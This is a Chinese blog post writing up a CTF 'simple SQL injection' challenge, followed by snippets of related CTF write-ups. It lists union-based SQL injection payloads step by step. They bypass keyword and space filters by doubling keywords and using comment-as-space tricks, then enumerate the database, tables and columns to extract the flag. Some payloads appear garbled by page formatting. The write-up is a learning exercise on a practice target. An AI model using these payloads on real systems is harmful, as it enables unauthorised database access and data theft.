CTF实验吧简单的sql注入。自己写的wp!

最新推荐文章于 2022-11-19 14:39:49 发布
最新推荐文章于 2022-11-19 14:39:49 发布
阅读量1.4k 收藏 2
点赞数 1
分类专栏: web   命令注入 基于错误的单引号注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41326328/article/details/89817625
版权

这次来写了一个wp,我是小白希望大神们可以指点,因为自己是一个人搞sql,有人指点能够少走很多弯路。
先看这一题,我刚进来居然还来了个乱码,不管了开始,看到这题目,命令注入得到flag,就想这一题无非就是绕过过滤,进行爆库爆数据得到flag 在这里插入图片描述
输入1,2,3以后,得到一些表名,这时就在猜想后台sql查询语句为:select name where id =xxxxx;

  1. 先判断注入点
    先用1 and 1=1 发现and被过滤了 这里采用andand双写绕过
    1 andand 1=1 1 andand 1=2 发现不是数字型注入
    再用 1’andand 1=1–+ ;# 发现注释(–+,#)都被过滤了 这里采用1’ andand ‘1’=’1进行注释
    得到这个应该是‘字符型注入(这里我有点不大明白,但是这样注入可以爆出来,所以也就是将错就错了,希望有大神可以给我指点一下子,而且此时的order by我实验也没成功,索性直接爆)

  2. 暴库,表(建议也可以先查库再查表)
    这里先不要闭合前面的‘,先直接输入查询语句,看看这个sql后台究竟过滤了哪些
    1 union select group_concat(table_name) from information_schema .tables where table_schema =database()–+
    在这里插入图片描述

发现注释–+,#什么的都被过滤了,可以考虑利用andand’1’=’1进行闭合后面的’号;发现有空格过滤,这里可以选择双写绕过和/**/(注释空格)进行绕过,发现group_concat;information_schema;table_schema都需要进行双写绕过

构造得:
1’//union//select//group_concagroup_concatt(table_name)//from//information_schema.tables//where//tabltable_schemae_schema//=database() andand ‘1’='1
在这里插入图片描述

得到表balotali,flag,web_1表,只有flag表对我们有用
我发现直接出表太利索了,得不到数据库,所以还是一步一步来把 !

  1. 爆库
    1’ union select database()’
    发现都被过滤了
    构造得1’//union//select/**/database()’
    在这里插入图片描述
    得到数据库:web1(有用)

  2. 爆表
    和上述一样先进行正常的sql语句
    1 union select group_concat(table_name) from information_schema.tables where table_schema=’web1’
    得到的还是被过滤的信息
    在这里插入图片描述
    根据//注释空格还用双写group等函数进行绕过
    1’/    /union//select//group_concagroup_concatt(table_name)//from//information_schema.tables//where//table_schemtable_schemaa='web1
    在这里插入图片描述
    得到flag和web_1表,可知flag对我们有用进行查列

  3. 查列
    1’ union select column_name from information_schema.columns where table_name=’flag’
    在这里插入图片描述
    构造得:
    1’//union//select//column_namcolumn_namee//from//information_scheminformation_schema.columnsa.columns//where/**/table_name=‘flag’ andand ‘1’='1(这里可以用andand ‘1’=’1进行闭合)
    在这里插入图片描述
    得到列名为:flag对我们有用

  4. 查数据
    直接构造得:1’//union//select//flag//from//flag//where/**/‘1’='1
    得到flag
    在这里插入图片描述
    总之,这道题考的还是很有意思的,刚开始做的时候,自己构造语句很多都构造错,返回报错,看报错信息一脸懵,双写绕过很常见,重点就是过滤掉了注释和空格过滤,需要利用/注释/绕过空格,也可以利用括号,考这一点让我学到了,很实用,所以自己想写一个wp,充实一下自己,我自己写的估计有很多地方不对,希望帮忙指点一下子。

夏天吖!
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
[网络安全自学篇] 八十.WHUCTF之WEB类解题思路WP(代码审计、文件包含、过滤绕过、SQL注入
杨秀璋的专栏
05-29 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了Windows PE病毒, 包括PE病毒原理、分类及感染方式详解,并通过案例进行介绍。这篇文章将介绍WHUCTF部分题目,第一次参加CTF,还是能学到很多东西。下面分享四个我完成的WEB类型题目的解题过程,希望对您有所帮助。本来感觉能做出6道题目,但有两道题卡在某个点,后面几天忙于其他事情,就没再参加。人生路上,要珍惜好每一天与家人陪伴的日子。感谢武汉大学,感谢网安学院,感谢这些大佬
CTF」-「SQL」- 简单SQL注入1
小落的博客
10-26 613
简单SQL注入1 测试注入点 测试过滤规则 简单的添加一个union,发现没有过滤 (1union 这怎么有点像php弱类型了) 在union加一个空格以及一个and,发现union被过滤,那么可以猜测他的过滤规则和两端的空格有关。、 3. 查看到底有几个关键词被过滤了 1 union select group_concat(table_name) from informa...
CTF-web题之简单SQL注入
qq_25046827的博客
11-24 5183
这两天闲着没事报名了学校信安和网安组织的网络安全大赛,靠着仅有的一点web知识做了几道web题,现在记录一下其中一道sql注入题的解题思路 首先题面如下 首先通过语句判断有多少个字段: 1' or 1=1 order by 4 # 1' or 1=1 order by 3 # order by是按by后面的数字或字段名所在列进行排序,如果结果集只有3列,order by4则会报错,故可以用来判断结果集的字段数 第一条语句报错,第二条语句返回 admin 5ef582761f2cafceebdfc8c
ctf题库--简单sql注入
miko2018的博客
08-21 5885
<题目> mysql报错注入 格式:flag{} 解题链接: http://ctf5.shiyanbar.com/web/index_3.php <解答> 1.打开题目链接,在查询中输入1,发现地址栏变化。 2.认为这里可能(看题目其实知道是一定)存在一个sql注入。 3.使用工具sqlmap进行注入(以该地址栏id值为例)。 查看当前数据库: Sqlmap -u "...
CTF刷题总结(1)------简单SQL注入
qq_45047250的博客
04-25 1410
第一次分享类的文章,有错误的地方还请大家多多指正哈!此篇文章主要分享一些刷web题目中会遇到的一些知识点,之后还会继续分享一些关于这方面的知识。 文章目录简单sql注入预备知识注入前判断如何判断注入顺序及操作总结 简单sql注入 预备知识 schema:可以代表数据库的组织和结构,其中schema和schemata的模式可以是表、列、数据类型、关系、主键等等。下面会通过例子来说明,大家可以自行体会。 information_schema: 是MySQL自带的信息数据库,用于存储数据库元数据(例如:数
ctf wp
qq_63267612的博客
04-03 2902
文章目录被嗅探的流量镜子里的世界隐藏的钥匙另外一个世界神秘龙卷风[第一章 web入门]常见的搜集web签到 被嗅探的流量 下载后打开题目没有思路,查看别人的wp发现是文件传输找POST的包,用wireshark追踪http流量 http.request.method==POST在文件末尾找到flag 镜子里的世界 打开后是一张图片,隐套路,查看属性,用winhex打开都没发现什么有用的信息,这时注意到图片名steg想到了用stegslove打开图片,查看图片并没有发现有用的信息,调整后发现flag 隐
1.实验吧——sql注入1(flag,到底过滤了什么东西? )
qwsn
11-08 3675
0x01:题目 实验吧——sql注入1网址 题目 http://ctf5.shiyanbar.com/423/web/ flag,到底过滤了什么东西? 0x02:WP复现 1.正常访问: http://ctf5.shiyanbar.com/423/web/ #如下图所示 2.输入单引号'测试: 在输入框里输入:' #如图所示,为GET型注入+字符型注入 http:/...
CTF-实验简单sql注入
才不是小弱鸡的博客
05-07 1665
好吧,其实这题我也是看了wp才知道的wp的老哥个个都是人才,脑洞很大,知识丰富,还会嘤嘤嘤,我超喜欢的。咳咳咳,跑题了,这题一看就是sql注入嘛(别问我为什么知道,自己看题目名)先进行过滤测试。先试试1 and 1=1,发现返回显然and被过滤了然后继续测试,结果发现sql语句基本上都被过滤了QAQ看wp发现这里其实是过滤后面带有空格的关键字了解这个就可以开始愉快的注入了先查一下数据库 1'/*...
ctf实验吧,后台登陆wp
qq_42728977的博客
07-29 405
暑假刷题系列: 看到这道题的界面大致判断是注入 输入’ or 1=1,无果后,看看源码吧,右键看源码,如下: <!-- $password=$_POST['password']; $sql = "SELECT * FROM admin WHERE username = 'admin' and password = '".md5($password,true)."'"; $result=...
实验吧三道sql注入题目解题思路以及当中至少点整理(简单SQL注入简单SQL注入2、简单SQL注入
xiaotaode2012的专栏
08-12 4087
0x00 最近学习CTF有一段时间了,下面将实验吧三题题目的简单SQL注入进行一定的整理, 0x01 简单sql注入 做题的地址为: http://ctf5.shiyanbar.com/423/web/ 第一步:随便输入个数字load下url:http://ctf5.shiyanbar.com/423/web/?id=1发现是这个,老套路,既然题目提示是过滤 我们来各种试试到底过滤了
CTFshow--Web2,简单SQL注入
weixin_46637933的博客
02-28 431
SQL注入先找到注入点,然后测试字段:admin' or 1=1 union select 1,2,3 <!-- 该题过滤了空格符,所以用/**/做了绕过 有回显则爆库名:admin' or 1=1 union select 1,database(),3 接着爆库内表:admin' or 1=1 union select 1,group_concat(table_name),3 form information_schema.tables where table_schema='web2'
ctf的每天wp
dotbs的博客
04-08 647
我的第一次博客作,ctf的每天wp**1.单身二十年** 1.单身二十年 题目地址:http://ctf.nuptzj.cn/challenges# 拿到这道题第一时间就点到超链接标签,但没有显示flag,后退一步右击超链接审查元素,发现元素显示”search.key.php “。但实际的跳转链接是:“no_key_is_here_forever.php “ 解法一:接下来点击网络,勾选持续日志...
wp
最新发布
dmtnb的博客
11-19 195
网安招新的一些题目
业余WP程序玩玩
半个工程师...
02-06 567
想来想去,觉得闲着也是闲着,尤其是女朋友那句,你想来想去,30迟早都会到的. 所以我觉得学个业余爱好,虽然感觉学手机软件没什么收入,不过可以当个业余爱好.反正现在公司的工作和软件完全不相干,总没有干私活的说法啦. 本来想学安卓,但是想想安卓的碎片化,我还是没了兴趣,而且我再也不想花无谓的时间在装smSDK上面,所以就学WP吧,反正我本来也不懂JAVA也不懂C#,所以就选个IDE简单点的好了.
ctfshow F5杯 部分WP(writeup) 超详细
mumuzi的博客
02-24 4445
本文共4370字,147段落,全文看完预计用时10分钟 这次F5杯的misc难度感觉比大吉杯难了许多,出题人的脑洞太大了 在这里感谢各位大师傅群里的随缘hint(水群大胜利) 的非常详细,可以跟着实际操作,所以最后不会贴上静态flag web       eazy-unserialize &eazy-unserialize-revenge misc       大小二维码 &n
ctf简单SQL注入(1)
wuerror的博客
07-14 2357
ctf注入套路(一):从系统内置的库来找到flag所在的表。例子:点击打开链接(实验简单SQL注入之2,1也是同样的套路)先输入1,再输入1',页面报语法错误,再输入1 '页面出现SQLi detected!,推出空格被它过滤。用/**/来代替空格。输入 1'/**/union/**/select/**/schema_name/**/from/**/information_schema.sch...
自己的 WordPress 模板
热门推荐
努力是为了站在万人之中,成为别人的光
11-04 2万+
我们将在这一点上结束这篇文章,但 你需要知道关于 WordPress 仍有很多东西要学习。这只是一个示例练习,但标准主题会非常复杂。不过,我们希望 你学到了一些新东西。如果有不明白的地方,请在评论中提及。如果有需要更正的地方,请告诉我们!如果 你对进一步改进有任何反馈或建议,我们也将不胜感激。我们很想看看 你通过这篇文章学到了什么。因此,请分享指向 你的第一个 WordPress 主题的链接。你的第一步可以使新来者振作起来。
CTF一些入门题目的wp(一)
qq_41788666的博客
05-25 1658
1. XSS注入测试 题目链接(http://103.238.227.13:10089)        进入网页后发现        由题目原先的提示得知注入点为id(GET方法),查看网页源代码,发现如下代码         猜测应该是将s赋值为用户传上去的id的值        innerHTML无法执行进来的script  可以构造img标签来使script执行        测试一波:ht...
网鼎杯 隐WP
ZKCQM23的博客
08-21 1849
别人告诉了怎么做,原理不怎么明白。怎么操作都查了半天。。。贴出来分享一下。 图片打开后是这样的,用Stegsolve打开,以前只会打开点点点,也不知道是什么意思        这边左右点转换的是颜色通道,alpha,RGB(red,green,blue)。具体是什么也不明白。。。(这只是一个说操作的WP 把A0和G0通道保存(file-&gt;save as,随便换个文件名和图...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值